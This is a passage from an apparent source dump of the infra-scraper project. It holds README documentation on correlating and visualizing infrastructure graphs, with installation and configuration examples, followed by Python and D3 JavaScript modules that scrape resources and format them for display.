In our case we find useful subgraphs of the infrastructures.\n\nFor example, in an OpenStack infrastructure we can show the ``aggregate zone`` -\n``hypervisor`` - ``instance`` relations and show the quantitative properties\nof hypervisors and instances. The properties used can be RAM or CPU, runtime\n(the age of resources) or any other property of value.\n\nAnother example would be filtering of resources by tenant or stack\nattribution. This reduces the number of nodes to a reasonable amount.\n\n\nInter-graphs\n~~~~~~~~~~~~\n\nOn the other hand you may want to combine several graphs to create one\noverlaying graph. This is very useful for combining otherwise unrelated\nresources. For example we can say that ``OpenStack Server`` or ``AWS\nInstance`` and ``Salt Minion`` are really the same resources.\n\n\nData Correlations\n-----------------\n\nWith the relational information we are now able to correlate resources and\njoined topologies from various information sources. This gives you the real\npower: having the underlying relational structure, you can gather\nunstructured metrics, events and alarms and put them into the proper context\nof your managed resources.\n\n\nMetrics Correlations\n~~~~~~~~~~~~~~~~~~~~\n\nThe metrics collected from your infrastructure can be assigned to various\nvertices and edges in your network. This can give you more insight into the\nutilisation of the depicted infrastructures.\n\nFor example, you can have the following query to the Prometheus server that\ngives you the rate of error response codes going through a HAProxy.\n\n.. code-block:: yaml\n\n    sum(irate(haproxy_http_response_5xx{\n        proxy=~\"glance.*\",\n        sv=\"FRONTEND\"\n    }[5m]))\n\nOr you can issue a query with the same result to the InfluxDB server:\n\n.. code-block:: yaml\n\n    SELECT sum(\"count\")\n    FROM \"openstack_glance_http_response_times\"\n    WHERE \"hostname\" =~ /$server/\n    AND \"http_status\" = '5xx'\n    AND $timeFilter\n    GROUP BY time($interval)\n    fill(0)\n\nHaving these metrics, you can assign these values as numerical properties of\nyour relational nodes and use them in the correct context.\n\n\nEvents Correlations\n~~~~~~~~~~~~~~~~~~~\n\nJust as you can query the time-series databases, you can also query\nElasticsearch for events.\n\n.. code-block:: yaml\n\n    \"searchSourceJSON\": {\n      \"index\": \"log-*\",\n      \"query\": {\n        \"query_string\": {\n          \"query\": \"*\",\n          \"analyze_wildcard\": true\n        }\n      },\n      \"filter\": []\n    }\n\nThe events are transformed to a numerical representation and again create\nnumerical properties of both nodes and edges.\n\n\nAlarms Correlations\n~~~~~~~~~~~~~~~~~~~\n\nYou can correlate the output of the alarm evaluators to dynamically set the\nstatus of resources. You can use the functional status of checks from\nPrometheus Alertmanager, Nagios or Sensu.\n\n\nVisualization Layouts\n=====================\n\nDifferent data require different diagram visualizations. Diagrams are symbolic\nrepresentations of information according to some visualization technique. Every\ntime you need to emphasise different qualities of the displayed resources you\ncan choose from several layouts to display the data.\n\n\nNetwork Graph Layouts\n---------------------\n\nIn most cases we will be dealing with network data that have no single root\nor beginning.\n\n\nForce-Directed Graph\n~~~~~~~~~~~~~~~~~~~~\n\n`Force-directed graph` drawing algorithms are used for drawing graphs in an\naesthetically pleasing way. 
Their purpose is to position the nodes of a graph\nin two-dimensional or three-dimensional space so that all the edges are of\nmore or less equal length and there are as few crossing edges as possible, by\nassigning forces among the set of edges and the set of nodes, based on their\nrelative positions, and then using these forces either to simulate the motion\nof the edges and nodes or to minimize their energy.\n\n.. figure:: ./doc/source/static/img/force-directed-plot.png\n   :width: 600px\n   :figclass: align-center\n\n   Force-directed plot of all OpenStack resources (cca 3000 resources)\n\n\nHive Plot\n~~~~~~~~~\n\nThe `hive plot` is a visualization method for drawing networks. Nodes\nare mapped to and positioned on radially distributed linear axes — this\nmapping is based on network structural properties. Edges are drawn as curved\nlinks. Simple and interpretable.\n\n.. figure:: ./doc/source/static/img/hive-plot.png\n   :width: 600px\n   :figclass: align-center\n\n   Hive plot of all OpenStack resources (cca 3000 resources)\n\n\nArc Diagram\n~~~~~~~~~~~\n\nAn `arc diagram` is a style of graph drawing, in which the vertices of a graph\nare placed along a line in the Euclidean plane, with edges being drawn as\nsemicircles in one of the two halfplanes bounded by the line, or as smooth\ncurves formed by sequences of semicircles. In some cases, line segments of the\nline itself are also allowed as edges, as long as they connect only vertices\nthat are consecutive along the line.\n\n.. figure:: ./doc/source/static/img/arc-diagram.png\n   :width: 600px\n   :figclass: align-center\n\n   Arc diagram of OpenStack project's resources (cca 100 resources)\n\n\nAdjacency Matrix\n~~~~~~~~~~~~~~~~\n\nAn adjacency matrix is a square matrix used to represent a finite graph. The\nelements of the matrix indicate whether pairs of vertices are adjacent or not\nin the graph.\n\n.. figure:: ./doc/source/static/img/adjacency-matrix.png\n   :width: 600px\n   :figclass: align-center\n\n   Adjacency matrix of OpenStack project's resources (cca 100 resources)\n\n\nHierarchical Edge Bundling\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDanny Holten presents an awesome and aesthetically pleasing way of simplifying\ngraphs and making tree graphs more accessible. What makes his project so\nuseful, however, is how he outlines the particular thought process that goes\ninto making a visualization.\n\n.. figure:: ./doc/source/static/img/hiearchical-edge-bundling.png\n   :width: 600px\n   :figclass: align-center\n\n   Hierarchical edge bundling of SaltStack services (cca 100 resources)\n\n\nTree Graph Layouts\n------------------\n\nDirected graph traversal can give us acyclic structures suitable for showing\nparent-child relations in your subgraphs.\n\n\nInstallation\n============\n\nThe release version of infra-scraper is currently available on `PyPI\n<https://pypi.org/project/infra-scraper/>`_; to install it, simply execute:\n\n.. code-block:: bash\n\n    pip install infra-scraper\n\nTo bootstrap the latest development version into a virtualenv, run the\nfollowing commands:\n\n.. code-block:: bash\n\n    git clone [email protected]:cznewt/infra-scraper.git\n    cd infra-scraper\n    virtualenv venv\n    source venv/bin/activate\n    python setup.py install\n\n\nConfiguration\n=============\n\nYou provide one configuration file for all providers. The default location is\n``/etc/infra-scraper/config.yaml`` but it can be overridden by the\n``INFRA_SCRAPER_CONFIG_PATH`` environment variable, for example:\n\n.. 
code-block:: bash\n\n    export INFRA_SCRAPER_CONFIG_PATH=~/scraper.yml\n\n\nETCD hosted configuration\n-------------------------\n\nYou can use ETCD as a storage backend for the configuration and scrape\nresults. The following environment variables need to be set:\n\n.. code-block:: bash\n\n    export INFRA_SCRAPER_CONFIG_BACKEND=etcd\n    export INFRA_SCRAPER_CONFIG_PATH=/service/scraper/config\n\n\nStorage configuration\n---------------------\n\nThe preferred scraping storage backend is the Neo4j service accessed via the\nBolt interface.\n\n.. code-block:: yaml\n\n    storage:\n      backend: neo4j\n      database_url: 'bolt://neo4j:[email protected]:7687'\n    endpoints: {}\n\n\nYou can set your local filesystem path where scraped data will be saved.\n\n.. code-block:: yaml\n\n    storage:\n      backend: localfs\n      storage_dir: /tmp/scraper\n    endpoints: {}\n\nYou can also set the scraping storage backend to use the ETCD service.\n\n.. code-block:: yaml\n\n    storage:\n      backend: etcd\n      storage_path: /scraper/data\n    endpoints: {}\n\n\nEndpoints configuration\n-----------------------\n\nEach endpoint kind expects a slightly different set of configuration. The\nfollowing samples show the required parameters to set up individual\nendpoints.\n\n\nAmazon Web Services\n~~~~~~~~~~~~~~~~~~~\n\nAWS scraping uses ``boto3``, the high-level AWS Python SDK, for accessing and\nmanipulating AWS resources.\n\n\n.. code-block:: yaml\n\n    endpoints:\n      aws-admin:\n        kind: aws\n        config:\n          region: us-west-2\n          aws_access_key_id: <access_key_id>\n          aws_secret_access_key: <secret_access_key>\n\n\nKubernetes\n~~~~~~~~~~\n\nKubernetes requires some information from the kubeconfig file. You provide the\nparameters of the cluster and the user to the scraper. These can be found\nunder the corresponding keys.\n\n.. code-block:: yaml\n\n    endpoints:\n      k8s-admin:\n        kind: kubernetes\n        layouts:\n        - force\n        - hive\n        config:\n          cluster:\n            server: https://kubernetes-api:443\n            certificate-authority-data: |\n              <ca-for-server-and-clients>\n          user:\n            client-certificate-data: |\n              <client-cert-public>\n            client-key-data: |\n              <client-cert-private>\n\n.. note::\n\n    Options ``config.cluster`` and ``config.user`` can be found in your\n    ``kubeconfig`` file. Just copy the config fragment with the cluster\n    parameters and the fragment with the user parameters.\n\n\nOpenStack\n~~~~~~~~~\n\nConfigurations for keystone v2 and keystone v3 clouds. Config for single\ntenant scraping.\n\n.. code-block:: yaml\n\n    endpoints:\n      os-v2-tenant:\n        kind: openstack\n        description: OpenStack (keystone v2) tenant\n        scope: local\n        layouts:\n        - arc\n        - force\n        - hive\n        - matrix\n        config:\n          region_name: RegionOne\n          compute_api_version: '2.1'\n          auth:\n            username: user\n            password: password\n            project_name: project-name\n            domain_name: 'default'\n            auth_url: 'https://keystone-api:5000/v3'\n\nConfig for scraping resources from the entire cloud.\n\n.. code-block:: yaml\n\n    endpoints:\n      os-v2-admin:\n        kind: openstack\n        description: OpenStack (keystone v2) cloud\n        scope: global\n        layouts:\n        - force\n        - hive\n        config:\n          region_name: RegionOne\n          auth:\n            username: admin\n            password: password\n            project_name: admin\n            auth_url: https://keystone-api:5000/v2.0\n\n\nSaltStack\n~~~~~~~~~\n\nConfiguration for connecting to the Salt API.\n\n.. code-block:: yaml\n\n    endpoints:\n      salt-global:\n        kind: salt\n        layouts:\n        - force\n        - hive\n        config:\n          auth_url: 'http://127.0.0.1:8000'\n          username: salt-user\n          password: password\n\n\nTerraform\n~~~~~~~~~\n\nConfiguration for parsing Terraform templates.\n\n.. 
code-block:: yaml\n\n    endpoints:\n      tf-aws-app:\n        kind: terraform\n        layouts:\n        - hive\n        config:\n          dir: ~/terraform/two-tier-aws\n\nUsage\n=====\n\nThe application comes with several entry commands:\n\n\nScraping commands\n-----------------\n\n**scraper_get <endpoint-name>**\n\n  Scrape a single endpoint once.\n\n**scraper_get_forever <endpoint-name>**\n\n  Scrape a single endpoint continuously.\n\n**scraper_get_all**\n\n  Scrape all defined endpoints once.\n\n**scraper_get_all_forever**\n\n  Scrape all defined endpoints continuously.\n\n\nUI and utility commands\n-----------------------\n\n**scraper_status**\n\n  Display the service status, endpoints, scrapes, etc.\n\n**scraper_web**\n\n  Start the UI with visualization samples and the API that provides the\n  scraped data.\n\nExample Platform Metadata\n=========================\n\nThe following outputs show the available resources and relations from a given\ndomain.\n\n\nKubernetes\n----------\n\n.. code-block:: yaml\n\n    kind: kubernetes\n    name: test-kubernetes\n    relations:\n      k8s:deployment-k8s:namespace: 22\n      k8s:deployment-k8s:replica_set: 62\n      k8s:endpoint-k8s:namespace: 28\n      k8s:event-k8s:namespace: 52\n      k8s:persistent_volume_claim-k8s:namespace: 1\n      k8s:pod-k8s:namespace: 52\n      k8s:pod-k8s:node: 52\n      k8s:pod-k8s:service: 52\n      k8s:replica_set-k8s:namespace: 62\n      k8s:replica_set-k8s:pod: 51\n      k8s:replication_controller-k8s:namespace: 1\n      k8s:secret-k8s:namespace: 1\n      k8s:service-k8s:namespace: 30\n      k8s:service_account-k8s:namespace: 1\n    resources:\n      k8s:deployment: 22\n      k8s:endpoint: 28\n      k8s:event: 52\n      k8s:namespace: 4\n      k8s:node: 5\n      k8s:persistent_volume: 1\n      k8s:persistent_volume_claim: 1\n      k8s:pod: 52\n      k8s:replica_set: 62\n      k8s:replication_controller: 1\n      k8s:secret: 1\n      k8s:service: 30\n      k8s:service_account: 1\n    timestamp: 1508692477\n\n\nOpenStack\n---------\n\n.. code-block:: yaml\n\n    kind: openstack\n    name: test-openstack\n    relations:\n      os:floating_ip-os:project: 617\n      os:hypervisor-os:aggregate: 46\n      os:network-os:project: 575\n      os:port-os:hypervisor: 3183\n      os:port-os:network: 3183\n      os:port-os:project: 3183\n      os:port-os:server: 3183\n      os:router-os:project: 42\n      os:server-os:flavor: 676\n      os:server-os:hypervisor: 676\n      os:server-os:project: 676\n      os:stack-os:network: 7\n      os:stack-os:port: 17\n      os:stack-os:project: 2\n      os:stack-os:server: 7\n      os:stack-os:subnet: 7\n      os:subnet-os:network: 567\n      os:subnet-os:project: 567\n    resources:\n      os:aggregate: 13\n      os:flavor: 43\n      os:floating_ip: 617\n      os:hypervisor: 72\n      os:network: 575\n      os:port: 3183\n      os:resource_type: 169\n      os:router: 42\n      os:server: 676\n      os:stack: 2\n      os:subnet: 567\n      os:volume: 10\n    timestamp: 1508694475\n\n\nSaltStack\n---------\n\n.. 
code-block:: yaml\n\n kind: salt\n name: test-salt\n relations:\n salt_job-salt_high_state: 552\n salt_job-salt_minion: 9\n salt_minion-salt_high_state: 689\n salt_service-salt_high_state: 689\n salt_service-salt_minion: 24\n salt_user-salt_job: 7\n resources:\n salt_high_state: 689\n salt_job: 7\n salt_minion: 3\n salt_service: 24\n salt_user: 2\n timestamp: 1508932328\n" }, { "alpha_fraction": 0.6084977388381958, "alphanum_fraction": 0.6084977388381958, "avg_line_length": 24.30769157409668, "blob_id": "fceadafcb4c032248220dcbad47daddecfe5bc1c", "content_id": "b65fc65bb7bb0fb12548025bc01d4394e1bde6a5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 659, "license_type": "permissive", "max_line_length": 62, "num_lines": 26, "path": "/infra_scraper/output/base.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport yaml\nimport json\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseOutput(object):\n\n def __init__(self, **kwargs):\n pass\n\n def get_data(self, data_format='raw', raw_data={}):\n data = raw_data.copy()\n if data_format == 'yaml':\n return self.yaml_output(self.transform_data(data))\n elif data_format == 'json':\n return self.json_output(self.transform_data(data))\n else:\n return self.transform_data(data)\n\n def yaml_output(self, data):\n return yaml.safe_dump(data, default_flow_style=False)\n\n def json_output(self, data):\n return json.dumps(data)\n" }, { "alpha_fraction": 0.6435045599937439, "alphanum_fraction": 0.6435045599937439, "avg_line_length": 29.045454025268555, "blob_id": "608c868ac40d0dd112af960aeb5ad355a1a4490e", "content_id": "e785a5d3f8527bc4a6b624e18ebe5ac075feca92", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 662, "license_type": "permissive", "max_line_length": 69, "num_lines": 22, "path": "/infra_scraper/constructors.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport json\nimport os\nimport threading\n\n_json_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), 'constructors.json')\n_class_mapping = None\n_class_mapping_lock = threading.Lock()\n\n\ndef get_constructor_mapping():\n global _class_mapping\n if _class_mapping is not None:\n return _class_mapping.copy()\n with _class_mapping_lock:\n if _class_mapping is not None:\n return _class_mapping.copy()\n tmp_class_mapping = {}\n with open(_json_path, 'r') as json_file:\n tmp_class_mapping.update(json.load(json_file))\n _class_mapping = tmp_class_mapping\n return tmp_class_mapping.copy()\n" }, { "alpha_fraction": 0.6602451801300049, "alphanum_fraction": 0.6602451801300049, "avg_line_length": 18.65517234802246, "blob_id": "582c587c9030b034f12cfe8338dd1e2672b0b09a", "content_id": "02a121457ed752bb7c5d31ed862800157d8111e4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 571, "license_type": "permissive", "max_line_length": 75, "num_lines": 29, "path": "/doc/source/text/app-install.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n============\nInstallation\n============\n\n\nPIP Installation\n================\n\nRelease version of infra-scraper is currently available on `Pypi\n<https://pypi.org/project/infra-scraper/>`_, to install it, simply execute:\n\n.. 
code-block:: bash\n\n    pip install infra-scraper\n\n\nInstallation from Source\n=========================\n\nTo bootstrap the latest development version into a virtualenv, run the\nfollowing commands:\n\n.. code-block:: bash\n\n    git clone [email protected]:cznewt/infra-scraper.git\n    cd infra-scraper\n    virtualenv venv\n    source venv/bin/activate\n    python setup.py install\n" }, { "alpha_fraction": 0.6231343150138855, "alphanum_fraction": 0.6231343150138855, "avg_line_length": 27.678571701049805, "blob_id": "fb883e387873df2a8f97a9d9a0719a9815aeb6b", "content_id": "05892df9f0405283bb85fbf66ef5eaa5b0fb257f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "permissive", "max_line_length": 94, "num_lines": 28, "path": "/infra_scraper/output/count.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom datetime import datetime\n\nimport logging\nfrom .base import BaseOutput\n\nlogger = logging.getLogger(__name__)\n\n\nclass CountOutput(BaseOutput):\n\n    def __init__(self, **kwargs):\n        super(CountOutput, self).__init__(**kwargs)\n\n    def transform_data(self, data):\n        resources = {}\n        relations = {}\n\n        for resource_name, resource_data in data['resources'].items():\n            resources[resource_name] = len(resource_data)\n\n        for relation_name, relation_data in data['relations'].items():\n            relations[relation_name] = len(relation_data)\n\n        data['resources'] = resources\n        data['relations'] = relations\n        data.pop('resource_types')\n        data['date'] = datetime.fromtimestamp(data['timestamp']).strftime('%Y-%m-%dT%H:%M:%S')\n        return data\n" }, { "alpha_fraction": 0.419345498085022, "alphanum_fraction": 0.4205039143562317, "avg_line_length": 42.10975646972656, "blob_id": "ffc4d9d9fa1a77464b386ded277578c14df5eff0", "content_id": "8f46b494d3c3ce014c0eaf04aa74441f30a34862", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3453, "license_type": "permissive", "max_line_length": 84, "num_lines": 82, "path": "/infra_scraper/input/reclass.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom infra_scraper.input.saltstack import SaltStackInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.reclass')\n\n\nclass SaltReclassInput(SaltStackInput):\n\n    def __init__(self, **kwargs):\n        super(SaltReclassInput, self).__init__(**kwargs)\n        self.kind = 'salt'\n\n    def _create_relations(self):\n        for resource_id, resource in self.resources.get('salt_job', {}).items():\n            for minion_id, result in resource['metadata'].get('Result', {}).items():\n                self._scrape_relation(\n                    'on_salt_minion',\n                    resource_id,\n                    minion_id)\n\n    def scrape_all_resources(self):\n        self.scrape_minions()\n        self.scrape_resources()\n        self.scrape_jobs()\n#        self.scrape_services()\n\n    def scrape_resources(self):\n        response = self.api.low([{\n            'client': 'local',\n            'expr_form': 'compound',\n            'tgt': 'I@salt:master',\n            'fun': 'reclass.graph_data'\n        }]).get('return')[0]\n        for minion_id, minion in response.items():\n            for service in minion['graph']:\n                service_id = '{}|{}'.format(service['host'],\n                                            service['service'])\n                self._scrape_resource(service_id,\n                                      service['service'],\n                                      'salt_service', None,\n                                      metadata=service)\n                self._scrape_relation(\n                    'on_salt_minion',\n                    service_id,\n                    service['host'])\n                for rel in service['relations']:\n                    if rel['host'] not in self.resources['salt_minion']:\n                        self._scrape_resource(rel['host'],\n                                              
rel['host'],\n                                              'salt_minion', None,\n                                              metadata={})\n                    rel_service_id = '{}|{}'.format(rel['host'],\n                                                    rel['service'])\n                    if rel_service_id not in self.resources['salt_service']:\n                        self._scrape_resource(rel_service_id,\n                                              rel['service'],\n                                              'salt_service', None,\n                                              metadata={})\n                        self._scrape_relation(\n                            'on_salt_minion',\n                            rel_service_id,\n                            rel['host'])\n                    self._scrape_relation(\n                        'requires_salt_service',\n                        service_id,\n                        rel_service_id)\n\n    def scrape_jobs(self):\n        response = self.api.low([{\n            'client': 'runner',\n            'fun': 'jobs.list_jobs',\n            'arg': \"search_function='[\\\"state.apply\\\", \\\"state.sls\\\"]'\"\n        }]).get('return')[0]\n        for job_id, job in response.items():\n            if job['Function'] in ['state.apply', 'state.sls']:\n                result = self.api.lookup_jid(job_id).get('return')[0]\n                job['Result'] = result\n                self._scrape_resource(job_id,\n                                      job['Function'],\n                                      'salt_job', None, metadata=job)\n" }, { "alpha_fraction": 0.4711343050003052, "alphanum_fraction": 0.4792573153972626, "avg_line_length": 35.294734954833984, "blob_id": "29b23558d6770ce9f3af1d6905989deb9f72bf20", "content_id": "0e375659e2d07e54ba2cd0ca01f0343166a8e775", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3447, "license_type": "permissive", "max_line_length": 123, "num_lines": 95, "path": "/infra_scraper/assets/static/js/d3.plot.treemap.js", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "var RelationalPlot = function(RelationalPlot){\n    /**\n     * Tree map rendering method\n     * @param dataUrl - Data endpoint URL\n     * @param graphSelector - Graph parent <div> CSS selector\n     * @param refreshInterval - Refresh interval in seconds (null for disabled)\n     */\n    RelationalPlot.treeMap = function(dataUrl, graphSelector, refreshInterval){\n\n        var width = $(graphSelector).innerWidth(),\n            height = width * 2/3;\n\n        var format = d3.format(\",d\");\n\n        var color = d3.scaleOrdinal()\n            .range(d3.schemeCategory10\n                .map(function(c) { c = d3.rgb(c); c.opacity = 0.6; return c; }));\n\n        var stratify = d3.stratify()\n            .parentId(function(d) { return d.id.substring(0, d.id.lastIndexOf(\".\")); });\n\n        var graph = this;\n        this._data = {};\n\n        this.init = function(alreadyRunning){\n            if(alreadyRunning && graph.treemap){\n                graph.treemap.remove();\n            }\n\n            graph.treemap = d3.treemap()\n                .size([width, height])\n                .padding(1)\n                .round(true);\n\n            if(!alreadyRunning){\n                graph.requestData(dataUrl, graph.render);\n                $(window).on('resize', function(ev){\n                    graph.resetPosition();\n                    graph.init(true);\n                    graph.render();\n                });\n\n                if(refreshInterval){\n                    setInterval(function(){\n                        graph.requestData(dataUrl, function(){\n                            graph.init(true);\n                            graph.render();\n                        });\n                    }, refreshInterval * 1000);\n                }\n            }\n        };\n        this.render = function(){\n\n            var root = stratify(graph._data)\n                .sum(function(d) { return d.value; })\n                .sort(function(a, b) { return b.height - a.height || b.value - a.value; });\n\n            graph.treemap(root);\n\n            d3.select(graphSelector)\n                .selectAll(\".node\")\n                .data(root.leaves())\n                .enter().append(\"div\")\n                .attr(\"class\", \"node\")\n                .attr(\"title\", function(d) { return d.id + \"\\n\" + format(d.value); })\n                .style(\"left\", function(d) { return d.x0 + \"px\"; })\n                .style(\"top\", function(d) { return d.y0 + \"px\"; })\n                .style(\"width\", function(d) { return d.x1 - d.x0 + \"px\"; })\n                .style(\"height\", function(d) { return d.y1 - d.y0 + \"px\"; })\n                .style(\"background\", function(d) { while (d.depth > 1) d = d.parent; return color(d.id); })\n                .append(\"div\")\n                .attr(\"class\", 
\"node-label\")\n .text(function(d) { return d.id.substring(d.id.lastIndexOf(\".\") + 1).split(/(?=[A-Z][^A-Z])/g).join(\"\\n\"); })\n .append(\"div\")\n .attr(\"class\", \"node-value\")\n .text(function(d) { return format(d.value); });\n\n };\n this.requestData = function(dataUrl, callback){\n d3.json(dataUrl, function(res){\n if(res && res.result === 'ok'){\n graph._data = res.data;\n console.log(graph._data)\n if(typeof callback === 'function'){\n callback();\n }\n }else{\n console.log(\"Cannot create topology graph, server returns error: \" + res.data);\n }\n });\n };\n };\n return RelationalPlot;\n}(RelationalPlot || {});" }, { "alpha_fraction": 0.5194973349571228, "alphanum_fraction": 0.5235630869865417, "avg_line_length": 35.554054260253906, "blob_id": "45ac1cc5b306c0ccea8617e77104a911876b4758", "content_id": "1807414ba3fd6967b6b27a238502e395839b664c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5411, "license_type": "permissive", "max_line_length": 94, "num_lines": 148, "path": "/infra_scraper/output/vis.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport logging\nfrom .base import BaseOutput\nfrom datetime import datetime\nfrom infra_scraper.utils import get_node_icon\n\nlogger = logging.getLogger(__name__)\n\n\nclass VisOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(VisOutput, self).__init__(**kwargs)\n\n def _transform_openstack(self, data):\n resources = {}\n relations = []\n axes = {}\n i = 0\n kinds = 0\n for resource_name, resource_data in data['resources'].items():\n if resource_name != 'os_port':\n kinds += 1\n\n for resource_name, resource_data in data['resources'].items():\n if resource_name != 'os_port':\n for resource_id, resource_item in resource_data.items():\n resource_item.pop('metadata')\n resources[resource_id] = resource_item\n icon = get_node_icon(data['resource_types'][resource_name]['icon'])\n axes[resource_name] = {\n 'x': i,\n 'angle': 360 / kinds * i,\n 'innerRadius': 0.2,\n 'outerRadius': 1.0,\n 'name': data['resource_types'][resource_name]['name'],\n 'items': len(data['resources'][resource_name]),\n 'kind': resource_name,\n 'icon': icon,\n }\n i += 1\n\n for relation_name, relation_data in data['relations'].items():\n for relation in relation_data:\n if relation['source'] in resources and relation['target'] in resources:\n relations.append(relation)\n\n data['resources'] = resources\n data['relations'] = relations\n data['axes'] = axes\n return data\n\n def _transform_default(self, data):\n resources = {}\n relations = []\n axes = {}\n i = 0\n kinds = len(data['resources'])\n for resource_name, resource_data in data['resources'].items():\n for resource_id, resource_item in resource_data.items():\n resource_item.pop('metadata')\n resources[resource_id] = resource_item\n icon = get_node_icon(data['resource_types'][resource_name]['icon'])\n axes[resource_name] = {\n 'x': i,\n 'angle': 360 / kinds * i,\n 'innerRadius': 0.2,\n 'outerRadius': 1.0,\n 'name': data['resource_types'][resource_name]['name'],\n 'items': len(data['resources'][resource_name]),\n 'kind': resource_name,\n 'icon': icon,\n }\n i += 1\n\n for relation_name, relation_data in data['relations'].items():\n for relation in relation_data:\n if relation['source'] in resources and relation['target'] in resources:\n relations.append(relation)\n\n data['resources'] = resources\n data['relations'] = relations\n data['axes'] = axes\n return data\n\n def transform_data(self, 
data):\n data['date'] = datetime.fromtimestamp(data['timestamp']).strftime('%Y-%m-%dT%H:%M:%S')\n if data['kind'] == 'openstack':\n return self._transform_openstack(data)\n else:\n return self._transform_default(data)\n\n\nclass VisHierOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(VisHierOutput, self).__init__(**kwargs)\n\n def _transform_openstack(self, data):\n resources = {}\n out_resources = []\n\n for resource_name, resource_data in resources.items():\n out_resources.append({\n 'name': resource_name,\n 'size': 1,\n 'relations': resource_data['relations']\n })\n data['resources'] = out_resources\n data.pop('relations')\n data.pop('resource_types')\n return data\n\n def _transform_default(self, data):\n resources = {}\n out_resources = []\n\n for resource_name, resource_data in data['resources'].items():\n if resource_name == 'salt_service':\n for resource_id, resource_item in resource_data.items():\n resource_item['relations'] = []\n resources['root|{}'.format(resource_id)] = resource_item\n\n for relation_name, relation_data in data['relations'].items():\n if relation_name == 'salt_service-salt_service':\n\n for relation in relation_data:\n relation['source'] = 'root|{}'.format(relation['source'])\n relation['target'] = 'root|{}'.format(relation['target'])\n resources[relation['source']]['relations'].append(\n relation['target'])\n\n for resource_name, resource_data in resources.items():\n out_resources.append({\n 'name': resource_name,\n 'size': 1,\n 'relations': resource_data['relations']\n })\n data['resources'] = out_resources\n data.pop('relations')\n data.pop('resource_types')\n return data\n\n def transform_data(self, data):\n data['date'] = datetime.fromtimestamp(data['timestamp']).strftime('%Y-%m-%dT%H:%M:%S')\n if data['kind'] == 'openstack':\n return self._transform_openstack(data)\n else:\n return self._transform_default(data)\n" }, { "alpha_fraction": 0.5586363673210144, "alphanum_fraction": 0.5586363673210144, "avg_line_length": 30.869565963745117, "blob_id": "1fe3156457dcb6c3ea61f26ec412827924ec67ac", "content_id": "2a21d47753c732a85af13f8c45fb3a74c5261c2e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2200, "license_type": "permissive", "max_line_length": 76, "num_lines": 69, "path": "/infra_scraper/input/base.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport time\nfrom infra_scraper.utils import setup_logger, get_graph_schema\n\nlogger = setup_logger('input.base')\n\n\nclass BaseInput(object):\n\n def __init__(self, **kwargs):\n self.name = kwargs['name']\n self.config = kwargs['config']\n self.resources = {}\n self.resource_types = {}\n self.relations = {}\n self.timestamp = int(time.time())\n self._reverse_map = None\n self._schema = get_graph_schema(self.kind)\n\n def _create_relations(self):\n raise NotImplementedError\n\n def to_dict(self):\n self._create_relations()\n return {\n 'name': self.name,\n 'kind': self.kind,\n 'timestamp': self.timestamp,\n 'resource_types': self._get_resource_types(),\n 'resources': self.resources,\n 'relation_types': self._get_relation_types(),\n 'relations': self.relations,\n }\n\n def _get_resource_types(self):\n res_map = {}\n for resource_name, resource in self.resources.items():\n res_map[resource_name] = self._schema['resource'][resource_name]\n return res_map\n\n def _get_relation_types(self):\n rel_map = {}\n for relation_name, relation in self.relations.items():\n rel_map[relation_name] = 
self._schema['relation'][relation_name]\n return rel_map\n\n def _get_resource_mapping(self):\n if self._reverse_map is None:\n self._reverse_map = {}\n for resource_name, resource in self._schema['resource'].items():\n self._reverse_map[resource['resource']] = resource_name\n return self._reverse_map\n\n def _scrape_resource(self, uid, name, kind, link=None, metadata={}):\n if kind not in self.resources:\n self.resources[kind] = {}\n self.resources[kind][uid] = {\n 'uid': uid,\n 'kind': kind,\n 'name': name,\n 'metadata': metadata,\n }\n\n def _scrape_relation(self, kind, source, target):\n if kind not in self.relations:\n self.relations[kind] = []\n self.relations[kind].append({\n 'source': source,\n 'target': target,\n })\n" }, { "alpha_fraction": 0.7458217144012451, "alphanum_fraction": 0.7513927817344666, "avg_line_length": 41.20588302612305, "blob_id": "abeccaabd2d0d401789800e87756a91c0bcbe074", "content_id": "29708f50e6a412e9c6189647db3fe174e67f2c62", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1436, "license_type": "permissive", "max_line_length": 88, "num_lines": 34, "path": "/doc/source/text/layout-bundle.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n==========================\nHierarchical Edge Bundling\n==========================\n\nA compound graph is a frequently encountered type of data set. Relations are\ngiven between items, and a hierarchy is defined on the items as well.\nHierarchical Edge Bundling is a new method for visualizing such compound\ngraphs. Our approach is based on visually bundling the adjacency edges, i.e.,\nnon-hierarchical edges, together. We realize this as follows. We assume that\nthe hierarchy is shown via a standard tree visualization method. Next, we bend\neach adjacency edge, modeled as a B-spline 